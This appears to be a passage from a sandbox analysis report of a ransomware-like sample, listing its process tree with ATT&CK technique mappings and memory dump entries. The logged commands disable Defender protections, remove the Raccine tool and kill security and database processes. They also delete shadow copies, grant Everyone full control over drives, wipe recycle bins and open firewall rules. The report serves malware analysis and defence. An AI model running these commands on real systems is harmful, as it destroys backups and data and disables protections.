  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  PID:1480
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:644
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1704
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1308
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1176
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:860
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1248
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:672
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:544
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1204
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:788
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1540
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:968
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1348
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1996
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:1208
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:956
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:652
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1212
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1012
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:776
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:788
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:1704
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:2024
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:1348
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:800
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:1472
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:1276
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:1012
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:1932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:1348
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1556
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1176
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:1704
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1924
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:1208
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:1368
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1348
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1248
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:1616
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:532
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1176
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:1144
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:1160
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1276
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:1932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:1704
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  PID:1652
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1208
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:2024
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:1752
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1248
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA0F1.bat
  2⤵
  PID:340
- - C:\Windows\system32\find.exe
    find "}\"
    3⤵
    PID:1700
- - C:\Windows\system32\mountvol.exe
    mountvol
    3⤵
    PID:1212
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{efb60be3-9a04-11eb-be03-806e6f6e6963}\
    3⤵
    PID:1732
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{efb60be4-9a04-11eb-be03-806e6f6e6963}\
    3⤵
    PID:1160
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:644
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{efb60be7-9a04-11eb-be03-806e6f6e6963}\
    3⤵
    PID:1592
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:328
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1708
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:544
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:824
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3b6fff8-e141-43af-bd2a-269db93b7a80 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1648
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1052
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:968
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1068
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:340
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1856
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1248
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:652
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1648
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:560
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1776
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:892
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:776
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:800
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:860
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:824
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1160
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1100
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:340
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13761155721986794809-1493866173-1910893253211593407953165207-1125627503-1647108966"
1⤵
PID:1204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1191651113-13346433231658390782342539021692812168-1087973126-892946284929361287"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19774514992063745945-974347785-103951018511422303969548461401528793181945740238"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "196700962-18330053071801255127-1198616170-1817106901865575577-17346466661115065155"
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-599463735-672272269-9201149432029812788-14765934551760979939656644865-868764459"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-465192196-9571944451256254972-1038971029-1606775532577937482-896512665-1711281103"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11518335781266852885-18066310891898066341-2080508518-5348167821080953589-1451577864"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "176871740716305045631123664020-1818959395313571608-122557174-1491186507595437401"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-133086344410419303511261091253-1098395045-206191471-71141930-775230793715951388"
1⤵
PID:672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2146428921-1612020045731318091152551151019433559611567519470454040442-432499136"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3242720156096035739844578815625526231880393434873460144885636091278395197"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18093276711860534578435971933-21290817906073727491299306536-18664242922062384493"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/396-130-0x0000000001F60000-0x0000000001F61000-memory.dmp

Filesize
4KB

Download
memory/396-125-0x000000001AD40000-0x000000001AD41000-memory.dmp

Filesize
4KB

Download
memory/396-137-0x0000000002010000-0x0000000002011000-memory.dmp

Filesize
4KB

Download
memory/396-72-0x000000001ACC0000-0x000000001ACC2000-memory.dmp

Filesize
8KB

Download
memory/396-68-0x0000000001F00000-0x0000000001F01000-memory.dmp

Filesize
4KB

Download
memory/396-65-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/396-127-0x000000001ACC4000-0x000000001ACC6000-memory.dmp

Filesize
8KB

Download
memory/1084-60-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/1084-62-0x000000001A830000-0x000000001A832000-memory.dmp

Filesize
8KB

Download
memory/1480-71-0x0000000002060000-0x0000000002061000-memory.dmp

Filesize
4KB

Download
memory/1480-79-0x000000001AB80000-0x000000001AB81000-memory.dmp

Filesize
4KB

Download
memory/1480-91-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/1480-76-0x000000001AAC0000-0x000000001AAC1000-memory.dmp

Filesize
4KB

Download
memory/1480-75-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1480-73-0x000000001ABE0000-0x000000001ABE2000-memory.dmp

Filesize
8KB

Download
memory/1480-74-0x000000001ABE4000-0x000000001ABE6000-memory.dmp

Filesize
8KB

Download
memory/1480-92-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

Filesize
4KB

Download
memory/1480-70-0x000000001AC60000-0x000000001AC61000-memory.dmp

Filesize
4KB

Download
memory/1752-171-0x00000000025A0000-0x00000000025A1000-memory.dmp

Filesize
4KB

Download
memory/1752-172-0x000000001AD10000-0x000000001AD11000-memory.dmp

Filesize
4KB

Download
memory/1752-173-0x000000001AC90000-0x000000001AC92000-memory.dmp

Filesize
8KB

Download
memory/1752-174-0x000000001AC94000-0x000000001AC96000-memory.dmp

Filesize
8KB

Download
memory/1752-175-0x0000000002670000-0x0000000002671000-memory.dmp

Filesize
4KB

Download
memory/1752-176-0x00000000022F0000-0x00000000022F1000-memory.dmp

Filesize
4KB

Download